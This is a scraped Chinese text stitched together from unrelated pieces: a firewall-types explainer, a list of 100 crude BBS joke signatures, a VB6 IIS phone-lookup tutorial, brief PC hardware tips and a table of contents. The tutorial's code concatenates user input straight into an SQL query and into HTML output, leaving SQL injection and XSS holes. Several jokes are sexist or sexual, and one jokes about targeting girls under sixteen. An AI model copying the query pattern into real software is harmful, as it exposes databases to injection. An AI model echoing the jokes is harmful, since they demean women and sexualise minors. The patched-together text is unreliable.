包过滤防火墙一般分为三个部分，一个脏端口（就是跟不信任网络相接的那个口）、一个干净端口（就是接入可信任网络的那个口）和一组规则（根据需要自己定制的）。

不信任网络中的数据从脏端口进入后，有规则库中的相关规则进行处理，并判断其数据是否合法，合法的数据包让其从干净端口通过，不合法就进行阻隔。

二、应用级网关型防火墙

在网络上混，偶尔可能会看到这样的名词：堡垒主机、代理网关、代理服务器。其实这三种名词都是一个意思，他们就是应用级网关型防火墙的称谓。

应用级网关型防火墙的安全度，相比包过滤级别要高。其实现的方法就是做为一个数据转发的过程，它能够给数据提供一个唯一的程序来接受客户应用程序的数据，并且要求这个程序做为中转站将数据发往目标。

所有经过应用级网关防火墙的数据，都有两选择，一个是通过，要么被拒绝。

三、电路级网关型防火墙

电路级网关型防火墙的运行方式与应用级网关型防火墙很相似，但是它有一个典型的特征，它更多的是面向非交互式的应用程序。在用户通过了最初的身份验证之后，电路级网关型防火墙就允许用户穿过网关来访问服务器了，在此过程中，电路级网关型防火墙只是简单的中转用户和服务器之间的连接而已。

电路级网关型防火墙的典型应用例子就是代理服务器和SOCKS服务器。电路级网关型防火墙的工作方式是对从受信任网络发到不受信任网络的TCP连接中进行中转，在中转过程中，源IP地址被转换成电路级网关的IP地址，使得外界看来就是网关和目的地址在进行连接。

四、状态包检测型防火墙

状态包检测型防火墙是使用了一种SPI引擎的方式来工作的。它是前三种防火墙的一个折中。

状态包检测型防火墙的运行方式是：

1.检查数据包SYN位并作出判断是否是正在进行连接的，如果是，对数据包内容进行检查，否则检查数据包是否符合连接规则，如果符合规则，则对数据包内容进行检查，如果不符合就进行阻隔。

2.数据包通过内容检查，如果不符合就阻隔，符合则进行策略集对数据包内容检查，如果策略集检查通过，则数据送往目的地址并更新对话列表，进行日值记录，如果不通过，则进行阻隔。

       “各高校100天爆笑签名档”

1、小子，敢泡我马子！你说吧，是单挑还是群殴？群殴，我们一帮殴你一个；单挑，你挑我们一帮！

2、常函数和指数函数e的x次方走在街上，远远看到微分算子，

  常函数吓得慌忙躲藏，说：“被它微分一下，我就什么都没有啦！”

  指数函数不慌不忙道：“它可不能把我怎么样，我是e的x次方！”

  指数函数与微分算子相遇。

  指数函数自我介绍道：“你好，我是e的x次方。”

  微分算子道：“你好，我是‘d/dy！’”

3、夏天来了，天气热了，一群“bt”往北飞，一会儿排成“b”字，一会儿排成“t”字……

4、人生上半场22年，拒人3次，被拒2次，目前3：2领先……

    5、最近你男朋友气色不错啊~/他呀，天天都去bbs灌水！

    又用我的id灌水呀，你的呢？/都让我老爸用了！

    我跟我女朋友说你也到校友录上灌灌，哎，人家就认准bbs了！

    bbs啊，不错！mm又多又pp，我们一直在那儿灌水！

    学我们这专业的，没事，天天打游戏。有了这bbs，嗨！还真对得起咱这电脑！ bbs呀，明天灌！/bbs啊，天天灌！

    6、成功的男人白天瞎jb忙，晚上jb瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。所以，我要做成功的男人！

    --

    7、本人历年所获嘉奖总结：

     1985年4月29日，获小红花一朵，由大班赵奶奶亲自颁发；

     1998年6月1日，获进步最大奖一次，由刘老师发小本一个；

     2000年某月某日，获班篮球队新人奖，由张天光同学口头表扬；

     2001年12月18日，获北京电脑体育彩票一次，由帅小伙儿发奖金5元。

    8、（安徽某大学bbs）和尚拈花望月，恐龙坐地成仙。

    9、孔子东游，遇二小儿辩斗，问其故。

    一小儿曰：我以日本生自山东，故属东。

    一小儿曰：夕阳西下，日本归山西也明矣，是以属西。

    孔子不能决，后以问老子（就是我）。

    老子笑曰：孰为汝多知乎？日本无根基，岂能算东西 ！！

    10、防奸防盗防后勤……

    11、

    电脑是我大老婆 每天 我面对着大老婆 有天 三老婆挂了

    网络是我二老婆 ——> 上二老婆 ——> 二老婆断了 ——>我完了

    水木是我三老婆 访问三老婆 大老婆卖了

    12、对单身妹妹，我始终争取；对有夫之妇，我从未放弃；对十六岁以上女孩，我注意发掘；对小于十六的，要有战略性眼光。

    13、“我喜欢的女孩要像黛玉一样有才气，像宝钗一样懂事，像可卿一样漂亮，像湘云一样豪爽，像李纨一样忠贞，像探春一样能干，像凤姐一样精明，还要像元春一样有福气，呵呵……”

    “但我不喜欢女孩像黛玉一样弱不禁风，宝钗一样自私自利，可卿一样风流薄命，湘云一样不通世务，迎春一样呆头呆脑，惜春一样心灰意冷，妙玉一样矫柔造作，哈哈……”

    14、如果多吃鱼可以补脑让人变聪明的话，那么我至少得吃一对儿鲸鱼……：（

    15、要想和我处，先得和我住！住完我就黄，我就这么狂！黄完我再处，我就这么酷！处完我再甩，我就这么拽！

    16、西城上，诸葛亮一曲奏罢，余音绕梁，听得城外的十五万魏军如痴如醉。诸葛亮：“谢谢大家，每位请交门票费一两。”魏军大惊，片刻之间，十五万人逃得一个不剩……

    17、我有一个最大的梦想：20**年的意甲联赛最后一轮，这是一场国际米兰获胜就能夺冠而尤文输球就要降级的比赛……比赛的最后一分钟，雷科巴接维耶里传球，在越位十米的位置上，先晃过三个后卫，接着再推倒尤文的守门员，最后用手打进致胜一球……在全场的欢呼声中，我牵着爱人的手，走向球场中央，在那里举行我们的婚礼。可爱的莫拉蒂主席是我们的证婚人，而圣西罗全场八万名国米球迷在暴雨中一起点燃蜡烛为我们祝福……

    18、江湖风起云涌。善于使刀杀出一条血路的人，被称为刀客；手持长剑扬名立万的人，则被称为剑客；而在水木的时候，喜欢持瓢猛灌的人被称为……呵呵：）

     19、在我归隐了七个账号之后，我终于明白——真正应该归隐的不是账号，而是我的心。

    20、下雨了，别忘了打伞，湿身是小，淋病就麻烦啦～～～：）

    21、佛曰，色即是空，空即是色。今晚，偶想空一下……：）

    22、好男人是本博大精深的书，越看越着迷；好女人是汪清澈见底的泉，越品越有味。男人是辆车，不仅要会开，还要会修；女人是杯茶，不仅要会喝，还要会品。我是女人，你要不要来品品？

    23、好怀念小时候：记得小学老师骂我：“我一巴掌把你踢出去！”当时我想笑却不敢笑。现在，是敢笑却不会笑了……

    24、灌灌灌，bbs的法宝；分分分，水民的命根。

    25、爱生活，爱拉登，自然美……

    26、他们出版了一本中国最早的关于治疗阳痿的书——《金刚经》

    他们出版了一本中国最早的关于生理的书 ——《溢精经》

    他们建造了中国最早的精子库 —— 藏精阁

    他们供奉500暴露狂——500裸汉

    他们以一种变态的行为命名一尊菩萨——观阴

    他们是：和尚

    27、他徜徉校园，她擦肩而过。美丽的背影，他情不自禁，喊：“你真美呀，请停留一下！”她回首，他凝眸。结果两个人一起死掉了——她丑死了，他吓死了；他丑死了，她笑死了……

    28、光看不“re”，违反宪法！经常“re文”是我国的一项基本国策！

    29、我真想狠狠地往你脸上吐一泡狗屎！

    30、为了得到女友的赏识，今天我要做卧撑！……呃呀呀呀呀……好累啊，今天先俯卧，明天再撑！

    31、

    大一：电脑+网络=高数重修 ╮╮

    大二：拳皇+星际=4级不过 \█/~~我倒！

    大三：fifa+cs=学位不保 ●

    大四：一+二+三=失业

     32、开始，我不过迷上了mm这个尤物；而结果呢，我却爱上了泡妞这门艺术。

    33、学校派来的谈判专家气喘吁吁地爬上主楼的天台，我把手中的“glock18” 使劲地往人质的太阳穴顶了顶，他吓得后退了两步，“请不要伤害人质，有什么要求，我们可以考虑！”“很简单，把西山桥头的破路修一修，校内的黑店管一管，食堂的卫生好好搞一搞，宿舍熄灯时间往后延一延，澡堂的水价往下压一压……”“好的好的，你等等，我回去请示一下。”谈判专家下楼去了。大约一支烟的功夫，他回到天台，远远地喊道：“你还是开枪吧，我们不会起诉你的……”

    34、两女ab——a：听说你男朋友是浙大的？b：唉，我哪有这么好的福气……

    两男cd——c：听说你女朋友是浙大的？d：放屁！你女朋友才是浙大的呢！

    35、如果有来世，就让我们做一对小小的老鼠吧。笨笨的相爱，呆呆的过日子，拙拙的依偎，傻傻的一起。即便大雪封山，还可以窝在暖暖的草堆紧紧的抱着咬你耳朵……

    36、大学生活有时像被太监强奸，反抗是痛苦，不反抗还是痛苦！

    37、与时俱进，你我共赴高潮！

作者：chai2001 回复日期：2003-08-29 12:46:00

    38、看一个学校的规模首先要看学校门口医院的避孕tao的数量和种类……

    39、十年以前，津津有味地看偶像剧，逢到中间插播的广告，连忙换台或者上厕所；十年以后，津津有味地看各种广告，逢到偶像剧，连忙换台或者上厕所!

    40、作为一个科大的学生，我生是科大的人，死是科大的——死人!

    41、我爱的人明花有主，爱我的惨不忍睹；不在寂寞中恋爱，就在寂寞中变态！

    42、本人生性善良，平时就连踩死一只蚂蚁也会念经诵佛，超渡亡魂，并为其修坟造墓，更怕其死后单身寂寞，遂又踩死数十只蚂蚁为其做伴，可谓尽心尽力。希望性善者与我联系～～～（这年代真是啥人都有啊！）

    43、毕业典礼后，一个清华学生上了出租车激动地说“你好，我已经是清华02届毕业生啦！” 司机说“真巧，我是66届的”，遂一指道边卖红薯的老头儿说，“他毕业的时候还没解放呢～”

    44、医学专家忠告：水，是我们生命的源泉，请大家每天定时定量灌水。每天逛一逛，灌一灌，有益身心健康。早晨起来一桶水，饭前饭后一桶水，关键在于坚持，重点在于参与。

    45、我想知道为什么我想知道为什么我想知道为什么我只想知道为什么我非要知道为什么我一定要知道为什么。（此签名档无法断句，因为每一种断法就有一种含义）

    46、“灌”到海枯石烂! “re”到望眼欲穿!

    47、没有钱的浪漫，我可以牵着你的手漫步在满布白沙的海滩；

    1元的浪漫，我可以在冷清的公共电话亭旁拨通电话关心你；

    10元的浪漫，我可以在炎热的夏日买支棒冰让你消暑解热；

    100元的浪漫，我可以在寒冷的夜晚买份关东煮温暖你手心；

    1000元的浪漫，我可以陪你逛街买你喜欢的衣服；

    10000元的浪漫，我可以买手机给你，让我俩幸福的声音零距离。

    48、前不见自卑亭，后不见堕落街，念时光之匆匆，独怆然而小弟弟下……

    49、没上大学时奇怪为什么那么多人上了大学还要自杀，上了大学后奇怪为什么那么多人上了大学还要活着！

    50、吾表兄，年四十余。始从文，连考三年而不中。遂习武，练武场上发一矢，中鼓吏，逐之出。改学医，自撰一良方，服之，卒。

    51、一段刻骨铭心一见钟情师生忘年黄昏婚外同性恋！

    52、做女人“挺”好，做男人“挺”累！

    53、我来自云南元谋/你来自北京周口/我握住你长满绒毛的手/轻轻咬上一口/爱情/让我们直立行走

     54、上帝给我大脑——于是我思考；上帝给我双脚——于是我奔跑；上帝给我十指——于是我上网。经过思考，我奔跑着来上网……

     55、立志找女朋友“十三不要”：1-恐龙的不要；2-有过男朋友的不要；3-不是处女的不要；4-超过1.65的不要；5-不是重本的不要；6-是清华的不要；7-读了研的不要；8-1985年以后的不要；9-1981年以前的不要；10-有残疾的不要；11-爱打扮的不要；12-不温柔的不要；13-男人的不要！

    56、朋友，失恋过吗？没有？那你人生不完整呀！：）

    57、本人由于过于英俊，故有导演找我去演《巴黎圣母院》的男主角……

     58、 夜班工人说：“吃饭与ml是第一生产力。”偶翻了一个月的资本论，发现马克思没有说过这句话……

    59、诚征小 m m，陪我来灌水；吾灌水源头，君灌水源尾；上i d 挖坑，换m j 灌水；与版主理论，与战务拌嘴；上“十大”（排名）不慌，封全站不悔；快来小 m m，信件站内给。

    60、人们只看到英雄是英雄的时候，却没有看到英雄灌水的时候……

    61、我爱的人名花有主——嘿嘿嘿，就是俺啦！！！爱我的人春风得意---嘻嘻嘻，因为和我在一起！！！

    62、前不见jj，后不见mm，念sl之悠悠，独怆然而灌水！

    63、小时候，爸爸教育我说：“中国的的男女比例是107:101，如果不好好读书，你就是那个‘6’！” 长大了，我考上了清华，发现清华的男女比例是7:1，我还是那个“6“!!

    64、（一工科院校同学的签名档）我想早恋----但是已经晚了：（

    65、警察叔叔追我过了三条街、四条河、翻过了五座大山，终于抓住了我……的一只鞋！

    66、去西安出差的路上，一位大连老兄一阵狂吹大连多好多好，然后说大连建市一百周年的时候举行了很隆重的庆祝活动云云，然后问了旁边一人：“西安建市一百周年有什么庆祝活动没有？”旁边几位西安的哥们一愣，过了一会儿，逼出一句话来：“我记得西安建市600年的时候搞了一个‘烽火戏诸侯’吧……”

    67、五十年后，当你坐在壁炉旁边，怀里的孙儿问你：“2003年‘非典时期’你在哪里？”你不用支支吾吾地说：“噢……当时我在老家hunan province 铲粪呢……”相反，你可以自豪的告诉他：“为了我的国家，我留在北京和“sars”战斗呢！”

    68、做人当做朱容基，娶妻当娶徐静蕾！

    69、好好学习，天天想上 （八字真言，毁人不倦）

    70、一国两制三个代表四项基本原则五大常任理事国，六君子七大军区八项主张九个常委十大热门话题。（这位老哥对政治了解和概括的够透彻的了：））

71、我奶奶现在还在农村。自打我考上清华以后，每次回去奶奶总对我说:“家里那几块地，还有这个院子，这些鸡啊猪啊的，都是给你留着的”。可是看到今年的就业形势，我才终于体会到了奶奶的高瞻远瞩和良苦用心……

     72、我的大学四年：吃的比猪少，干的比鸭多；睡的比狗晚，起的比鸡早！

    73、21世纪内，我们的新“四化”目标是：给太阳装上开关，给黄河按上栏杆，给飞机设计倒档，为长城贴上瓷砖！

    74、轻轻地我来了，重重的我又要回去了。我挥一挥衣袖，顺走了一个博士学位。

    75、（武汉大学一哥们）拳打清华北大，脚踢复旦南开，剩下的都是晚辈，老夫不屑动手。

    76、每个女孩都曾是无泪的天使，当遇到自己喜欢的男孩时，便会流泪——于是变为凡人。所以男孩一定不要辜负女孩，因为女孩为你放弃了整个天堂！

    77、每个男孩都曾是地狱的恶魔，当遇到自己喜欢的女孩时，便会动心——于是变为凡人。所以女孩一定不要辜负男孩，不然男孩又要回到那可怕的地狱！（cbbs一位高人回复写的，牛x！）

    78、为兄弟两肋插刀，为美女插兄弟两刀。兄弟如手足，美女如衣服，谁穿我衣服我砍他手足；美女如衣服，兄弟如手足，谁动我手足我穿他衣服！！！

        79、从现在开始，老子只会恨你一个人，答应你的每一件事都要放鸽子，对你讲的每一句话都要违心，一定要欺负你骂你，要鄙视你，别人欺负你，老子要在第一时间出来一起欺负你，你开心呢，老子要弄得你不开心，你不开心呢，老子就让你更不开心，永远都要你觉得我是你梦里面最万恶的的男人！！！

        80、曾经有一篇故意灌水的文章摆在我的面前，可是我却没有将它删除，直到它被“re”了一万次后，我才追悔莫及。如果上天给我一个再来一次的机会的话，我一定将灌制“龙王”的post权（即发贴权）封掉，如果非要为这种封杀加一个期限的话，我希望是——一万年!!!

       81、要是我灌水，就骂我“三个代表”没学好吧……

        82、男人为性而爱，女人为爱而性；男人恋爱后变得可怜巴巴，女人恋爱后变得神经兮兮；女人恋爱期间渴望对方裸露心灵，男人恋爱期间渴望对方裸露身体……（谁说的这么tmd经典的话啊！！！）

        83、你说我酷吗？从正面看，你可能不接受；从侧面看，你可能认同；从半侧看，你可能最为欣赏！

        84、你以为躲起来我就找不到你了吗？没有用的，像你这样拉哄的男人，不管在什么地方都像漆黑中的萤火虫一样，那样的鲜明，那样的出众，你那犹豫的眼神、唏嘘的胡渣子、神乎奇技的刀法，还有那杯dry martini都深深的迷住了我……

        85、①未满18周岁人士请在父母指导下与本人聊天。

        ②本人非专业聊天人士，。不承担主动打招呼、主动找话题的义务。

        ③谢绝“三问一答制”，谢绝在聊天的时候使用“哦”，在本人不回复的情况下请自觉停止一切信息。

    【注】：本人拥有最终解释权。

    86、每个月总有那么几天，您的网络会受到黑客的攻击——坐立不安，烦躁无力，使用我和human开发的“月月舒”防火墙，超轻超薄，易于携带，提供由内到外的全方位保护，即使流量再大，也可以冲浪自如，再也不用担心侧漏.啦～～

    87、“张华考上了北京大学；李萍进了中等技术学校；我在百货公司当售货员：我们都有光明的前途。”——《新华字典》1998年修订本p673……

    88、剔除恐龙 美化校园！

    89、我的奋斗：注册帐号->看文章->看人家灌水->参与灌水->被封全站 ->接着灌水->没事->和版主搞好关系->当个版主->轻闲->当个大版版主->吊起来->被投诉->装孙子->被站务赏识->和站务套磁->请站务吃饭->申请实习站务->批准->开始实习->狂封人装大孙子->转正->名正言顺的灌水(以上内容纯属虚构，如有雷同纯属巧合)

    90、我他妈的那么爱你，你他妈的爱理不理；我她妈的为你沦陷，你他妈的装没看见；我他妈的为你自尽，你他妈的愣不相信；我他妈的为你跳楼，你他妈的才肯回头；你她妈的回心转意，我他妈的决定放弃！

    91、身体怎么补,？一天三顿大红薯；样子如何酷？三年一条牛仔裤！

    92、东边日出西边雨，导师无情我有情。

    93、俏也不思春，只把春来叫！ （猫啊？：））

    94、再过一个月我就要结婚了，本来说好再过三个月结婚，可是我等不急了。水不是一下子烧开的，不小心一下子烧开了，也只好灌暖壶了。有些事你们不懂，妈是过来人，妈懂。把开水灌到暖壶里，盖上盖儿就塌实了，沏茶还是洗脚，就随你的便了。你明白吗？

    95、从现在开始，你只许陪我一个人灌水，要哄我不能骂我，我每一次上站你都要给我“msg”，对我灌的每一篇水你都要“re”，不是我灌的水你一篇都不许“re”。要关心我，别人“kick”我你要在第一时间出来帮我“kick”他，我想灌水的时候你必须陪我灌，你想灌水的时候我可以不陪你灌，永远都要只陪我一个人灌水，文章里也要提到我，在你的水里面只有我！！

    96、迅雷不及掩耳盗铃，以不变应万变不离其宗，成事不足挂齿，此物最相思风雨中，一屋不扫何以扫天下无敌，东边日出西边雨一直下，举头望明月几时有，呆若木鸡毛当令箭，杀鸡焉用牛刀小试，锋芒毕露春光，围魏救赵宝奎，very good bye，八格牙鲁冰花，一泻千里共婵娟……

    97、迎面走来一位妙龄少女，偶几天来委靡不振的腰板一下挺直了，两眼冒着青光，嘴角流着口水，一颗小心“扑通扑通”的跳着，心想：嘿嘿，是该下手的时候了……于是，一双罪恶的黑手伸向了少女……“’姊姊~，可怜可怜我吧，我已经好几天没吃东西了……”

    98、在下就是江湖上久未露面的：玉面无敌小飞龙，冷酷杀手大老虎！风靡万千少女，迷死无数情痴。改善社会风气，带动电影事业，推动经济成长，搞活市场经济，拉动内需，带起外需，建设祖国，努力四化！遇佛佛晕，碰鬼鬼倒，黑风寨上一枝花，盘丝洞前万人迷，传说中的虹口道场新精武门之玉树临风淫不动，一朵梨花压海棠的小淫虫——xxx——是也！

    99、兔子说：“乌龟比我慢”，乌龟说：“蜗牛比我慢”，蜗牛说: “靠，在cbbs发贴还比我慢呢！”——（c_chairman）

    100. 我1.45米，去年夏天参加北京大学生男子马拉松赛，谁知跑到半途，我突然晕过去了！等我醒来时，大家纷纷围上来关心地问我：“你怎么了，是不是虚脱了？”我脸一红，惭愧地说：“不是的……我是被乱‘棍’打晕的！”

暂时收录(待超级斑竹确认)，谢谢，只要是人气，精华，中天原创均可！

上篇是“各高校100天爆笑签名档”

接下来

摘要 本文介绍了Internet应用程序及相关概念，并通过一个示例，介绍了使用VB创建IIS应用程序来构建交互式WEB应用的方法。

关键字 Internet应用程序，IIS，HTML

Microsoft Visual Basic 6.0增强了创建Internet应用程序的功能。Internet应用程序是一种编译好的交互式应用程序，通过Internet或intranet能够访问这种应用程序。在VB中有两种类型的Internet应用程序：基于服务器的IIS应用程序和基于客户的DHTML应用程序。基于服务器的IIS应用程序驻留在WEB服务器上，应用程序使用HTTP Internet协议接受从客户端（如WEB浏览器）来的请求，处理相关的代码，然后向浏览器返回数据。IIS应用程序是一个VB应用程序，它在一个动态的、基于浏览器的应用程序中使用HTML和已编译VB代码的组合。对开发者来说，一个IIS应用程序是由一些被称为WebClass的特殊类型对象组成，而WebClass包含一系列称为Webitems的资源。WebClass是一个驻留在WEB服务器上并响应浏览器输入的VB部件,它作为应用程序的中央功能单元，处理来自浏览器的数据并向用户发送响应信息。

本文通过示例一个WEB应用--电话号码查询，说明创建IIS应用程序的一般过程。运行此程序需要IIS3.0、IIS4.0 或 PWS。用户在查询界面输入要查询部门相应的汉语拼音缩写或名称缩写，如为空，则提示输入部门名称；系统以表格形式返回模糊查询结果。

一、创建工程及模板

电话查询界面模板文件的代码如下：

< html>

< body bgcolor="#F6FAFF">

< p align="center"> < font size="6" face="幼圆"> < strong> 办公电话号码查询< /strong> < /font> < /p>

< p> < font size="4" face="黑体"> 查询说明:< /font>

您可以直接输入各部门的全名或主要名称,也可输入各部门汉语拼音首字符缩写串;查询结果将模糊匹配您所输入的关键字.如输入'网络中心'或'wlzx'.< /p>

< hr size="1" color="#008080">

< form method="POST">

< wc@error> < /wc@error>

< p align="center"> < font size="4"> 请输入要查询的部门:< /font> < /p>

< wc@FullName> < /wc@FullName>

< p align="center">

< font size="4">

< input type="submit" name="submit" value="发送" style="font-size: 15pt; font-family: 幼圆"> < input type="reset" name="reset" value="重设" style="font-family: 幼圆; font-size: 15pt"> < /font> < /p>

< /form>

< hr size="1" color="#008080">

< /body>

< /html>

可以看到，界面文件除了基本的HTML元素外，没有用于数据输入的元素，但多了"wc@error"等标记。Wc@标记是模板中使用的替换指示符。替换指示符是标记要用特定内容替换的位置，以备在用户请求时执行文本替换过程。这些标记具有标记前缀和标记名，标记前缀用于指示WebClass必须进行一个替换操作。通过设置每一个模板的TagPrefix属性定义标记前缀。Wc@是VB的缺省标记前缀。标记名可以识别替换的区域。执行文本替换是在一个WebClass模板文件中扫描特殊的指示符标记，然后用自定义的内容替换指示符或它们的内容。当WebClass在一个事件过程中响应WriteTemplate方法时，它自动处理这些指示符。替换完成后，响应用户一个替换过的HTML文件。

对含有标记前缀文件的处理顺序是：VB处理用户的代码，并从应用程序的一个事件处理程序中调用WriteTemplate方法。WebClass根据ProcessTag事件的代码处理并替换文件中所有前缀标记,然后将模板文件写到Response对象，WriteTemplate方法再发送模板文件到浏览器。

启动VB6，在新建工程中选择IIS应用程序。首先看到WebClass设计器，包含"HTML模板WebItems"和"自定义WebItems"。右击WebClass设计器的"HTML模板WebItems"，选择"添加HTML模板"，导入上述界面模板文件，然后将其命名为Phone_Search。如下图所示：

二、实现代码

双击WebClass设计器右边窗格的Form1标记，为表单提交动作定义一个自定义事件。该事件主要任务是接收用户输入的要查询数据，并把查询数据提交到数据库。具体代码见清单。

IIS应用程序应该指定用户首次访问时显示的内容，因此，在WebClass_Start事件中将WebClass的NextItem属性设置为Phone_Search，然后在Phone_Search_Respond事件中用模板的WriteTemplate方法将页面发送到客户端浏览器。在将页面发送到浏览器时，系统会遇到模板中的wc@标记，此时它会自动调用Phone_Search的ProcessTag事件，并把标记名字作为参数传递给事件处理过程Phone_Search_Respond，在这个过程中返回插入文档内定制标记所在位置的HTML代码。当在表单中输入数据并提交表单时，则执行Phone_Search_Form1过程，它接收表单的数据，如没有错误则调用自定义事件处理过程Searphone,该过程提交输入数据到数据源，执行查询并以表格形式返回结果集。

代码清单：

Option Explicit

Option Compare Text

'声明全局量

Dim FullName As String

Dim strError As String

'处理标记元素过程

Private Sub phone_search_ProcessTag(ByVal TagName As String, TagContents As String, SendTags As Boolean)

Select Case LCase(TagName)

'错误信息

Case "wc@error"

If strError < > "" Then

TagContents = "< hr> < font color=""red""> "

TagContents = TagContents & "请输入要查询的部门!" & _

strError & "< br> < hr> < /font> < br> < hr> "

End If

'查询的部门

Case "wc@FullName"

TagContents = "< center> < input type=""text"" value=""" & FullName & """

name=""FullName""> < /center> "

End Select

End Sub

'响应用户请求过程

Private Sub phone_search_Respond()

'响应用户请求，输出页面

phone_search.WriteTemplate

End Sub

Private Sub phone_search_Form1()

strError = ""

'获取表单值

FullName = Request("FullName")

'测试是否为空

If FullName = "" Then strError = strError & "< i> 部门不能为空!< /i> "

'如表单输入值为空，则提示输入数据，否则调用查询过程

If strError < > "" Then

Set NextItem = phone_search

Else

SearPhone

End If

End Sub

Private Sub WebClass_Start()

Set NextItem = phone_search

End Sub

Public Sub SearPhone()

Dim Mysql As String

Dim Dbconn As New ADODB.Connection

Dim mrd As New ADODB.Recordset

'打开数据源

Dbconn.Open "telphone"

'构造查询SQL语句

Mysql = "select * from phone where depart like '%" & FullName & "%'" & _

" or depart_p like '%" & FullName & "%'"

'执行SQL查询

Set mrd = Dbconn.Execute(Mysql)

'输出查询结果

With Response

.Write "< html> "

.Write "< body> "

.Write "< title> Search Results< /title> "

.Write "< h1> < font face=""Arial""> 查询结果如下:< /font> < /h1> "

If mrd.BOF And mrd.EOF Then '没有符合条件的值

.Write "< center> 对不起,没有相应的部门!< /center> "

Else '有符合条件的值，以表格形式输出

.Write "< center> "

.Write "< table border=""5"" wide=""50%""> "

.Write "< tr> < td> 部 门< /td> < td> 电 话< /td> "

Do While Not mrd.EOF

.Write "< tr> < td> "

.Write mrd("depart")

.Write "< /td> < td> "

.Write mrd("phone_no")

.Write "< /td> < br> "

mrd.MoveNext

Loop

End If

.Write "< /table> "

.Write "< h1> < font face=""Arial""> 谢谢使用< /font> < /h1> "

.Write "< /body> "

.Write "< /html> "

End With

'释放变量,关闭数据库连接

Set mrd=Nothing

Dbconn.close

End Sub

本例程使用了ACCESS数据库表Phone，DSN名为Telphone,表结构及部分示例数据如下。

Phone表结构:

字段名 类型 长度 说明

PhoneID 自动编号 长整形 主键

Depart 文本 20

Depart_p 文本 10

Phone_no 文本 7

示例数据:

1 网管中心 Wgzx 2419039

2 网管办 Wgb 2419187

3 计算机系办公室 Jsjxb 2419237

4 计算机系主任办公室 Jsjxb 2419236

5 计算机系实验室 Jsjxsys 2419234

如用户输入"网管"或"wg"后，程序响应其请求，返回结果如下图所示。

三、部署IIS应用程序

一个IIS应用程序必须作为一个进程内部件或一个DLL文件被创建。象编译其它VB工程一样，选择生成DLL文件。IIS应用程序编译时产生以下文件：一个VB用于运行工程的DLL文件；一个在浏览器中宿主应用程序并产生它的运行时部件的ASP文件；一个在编译和连接工程时由连接器产生的EXP文件；一个包含工程的窗口布局信息的VBW文件。然后使用VB的打包和展开向导来部署IIS应用程序。必须部署的应用程序包括DLL文件，与工程相关的HTML页面及被HTML页面引用的文件。

四、小结

用VB构造服务器端的IIS应用程序比其它的WEB应用开发具有减少每个用户部署费用，可重复使用部件，代码和HTML分离，高效等优点；而且由于对VB环境的熟悉，可以充分利用传统的编程方法。

参考资料：Microsoft MSDN 之Visual Basic文档

(本示例程序在Windows 98+PWS下运行成功)

人每天要做三件事：第一件是微笑[^_^]，第二件是欢笑[^o^]，第三件是大笑[^0^]，祝你欢笑每一天*^0^*现在不准傻笑!


主频、外频和倍频的区别是什么

《一键清理系统垃圾》

主频、外频和倍频的区别是什么

   CPU的工作频率(主频)包括两部分：外频与倍频，两者的乘积就是主频。
   所谓外部频率,指的就是系统总线频率，早期CPU的外频大多为66MHz与100MHz（P4已经达到400MHZ），而AMD公司的K7已经使用了高达200MHz的外部频率。
   倍频的全称是倍频系数。CPU的主频与外频之间存在着一个比值关系，这个比值就是倍频系数，简称倍频。倍频可以从1.5一直到10x以上，以0.5为一个间隔单位。
   外频与倍频相乘就是主频，所以其中任何一项提高都可以使CPU的主频上升。


注意湿度对电脑的影响

《一键清理系统垃圾》

返回总目录 上一页 目录页

注意湿度对电脑的影响

   随着计算机技术的迅速发展，计算机的质量以及可靠性都有了很大的提高。但是，由于计算机受组成部件和其它各种因素的影响，在工作时对使用环境的湿度有一定的要求。
   湿度过高或过低，都会直接影响计算机系统的工作质量，需要引起操作者的重视。一般情况下，计算机系统在工作时，要求使用环境的最佳湿度范围为45％～60％，而最大允许范围不应超过35％～80％。
   如果湿度过高，会引起湿气附着于计算机部件的表面，使机内电路工作性能降低，甚至出现短路而烧毁某些部件。更为严重的是，计算机内吸进湿空气后，会导致磁盘驱动器的金属部件生锈而损坏；印刷线路板的绝缘性能也会因此变差。湿度过高还会影响磁性材料，造成读写错误；计算机内部的接插件及有关接触部分会因湿度过大而漏电和接触不良。这些现象的出现，都要影响计算机系统的正常工作。湿度太低对计算机的影响也是很严重的。低湿度极容易产生静电，不仅会因为产生放电现象而造成火灾，还很易吸附灰尘，造成计算机线路短路和磁盘读写错误，严重时还会使磁盘或磁头损伤。
   为避免和减少湿度对计算机的影响，可采取以下措施：
   1．合理选择计算机用房的位置，尽量不用平房和楼房的底层，而选择湿度相对较小的楼房上层房间。
   2．放置计算机的房间内要有湿度计，以便随时掌握机房内湿度的变化情况。
   3．放置计算机的地方，有条件的可在机房内加装湿度调节设备，如抽湿机、加湿器等。
   4．遇到连续潮湿多雨的天气，对长期不用的机器，可以打开机盖用电吹风依次对某些部件吹一阵，加速潮湿空气的蒸发，以减轻对计算机的危害。


基础知识

《一键清理系统垃圾》

返回总目录

基础知识

◎FTP命令详解
◎IE浏览器的安全
◎IP地址从头说
◎Windows 98安装全过程
◎Windows Me的安装
◎WINDOWS XP超酷秘籍11条大放送
◎Windows XP注册表的应用
◎windows非法操作详解
◎Windows变慢原因分析及解决方法
◎不用专门软件照样修复硬盘分区表
◎常见网络下载方式简要介绍
◎超频基础
◎从Win98升级到Win2k
◎代理入门基础
◎电脑的常见硬件设备
◎电脑的软件组成
◎电脑故障检修之“望、闻、听、切”法
◎电脑升级概述
◎电脑问题的解决方法
◎电脑应用技巧问答
◎电脑知识面面观
◎给新手的电脑维修资料
◎根据电脑配置选择操作系统
◎购买笔记本四步走：望、闻、问、切
◎故障排除手册
◎1、什么是TCP/IP
◎几种OEM XP的BIOS及DMI修改法
◎计算机安全认识的七大误区
◎计算机的分类
◎计算机的基本组成
◎计算机发展史
◎计算机英语名词简释1
◎家用电脑基本知识
◎快捷关闭和重启电脑
◎快捷键全面掌控你的Windows系统
◎扩展名全解
◎拒绝停滞 全面提速Windows XP系统
◎认识“我的电脑”
◎认识UPS
◎认识你的电脑
◎认识硬盘
◎如何节省网费
◎刷新BIOS以及失败后的解决方法
◎网管人员必备的常用命令(1)
◎网络安全得注意 十类密码不能用
◎网络安全小知识两则
◎网络基本术语
◎网络名词解释
◎首先提议：
◎微机故障处理的一般性原则和方法
◎系统崩溃情况详解
◎显卡升级步步通
◎显示器选购十步走
◎为何不能进行磁盘碎片整理？
◎虚拟主机知识
◎选购液晶显示器（二）
◎选购液晶显示器（三）
◎选购液晶显示器（一）
◎一步一步教你升级主板
◎隐藏文件搜索大法
